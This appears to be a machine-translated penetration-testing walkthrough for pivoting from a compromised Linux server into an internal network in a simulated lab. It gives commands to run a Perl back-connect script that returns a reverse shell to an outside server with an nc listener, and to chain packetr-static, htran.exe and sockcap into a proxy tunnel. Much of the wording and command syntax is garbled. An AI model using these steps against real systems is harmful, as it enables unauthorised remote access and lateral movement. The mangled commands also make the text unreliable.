In a case where the details are not shown, the operation methods in the case are simulated on the local machine and recorded.
Environment:
Compromised Linux host (with root permission) ----- simulate a Linux Server 192.168.0.105 on my Intranet
Hack-my computer 192.168.1.101
Bounce to Internet server ----- my own internet server 61.160.2xx.xxx
Windows testing machine 192.168.1.109 for penetration testing
Tools:
In packetr-static Linux
In htran.exe windows
Use sockcap as a proxy to penetrate the Intranet
Process:
1. I simulate an extremely demanding environment. The compromised Linux server is not open to external users 22, but only has a web port 80, so we have to reverse the shell to a public network machine, I don't have this environment in the virtual machine, so I just want to give a brief introduction.
Upload the back. pl file to the tmp directory in linux and run
Perl/tmp/back. pl xxx. xxx Port
Run nc on a public network server
Nc-l-v-p port (same as above)
Now I have two windows, one proxy and one data forwarding.
Upload packetr-static and execute
./Packetr-static-s 1988
Forward data in one window and execute
./Packetr-static-slave 61.160.20x.xxx 123 127.0.0.1 1988
2. Run the command on the windows public network,
Htran.exe-p-listen 123 1988
3. Configure sockcap
4. Run the agent program to enter the Intranet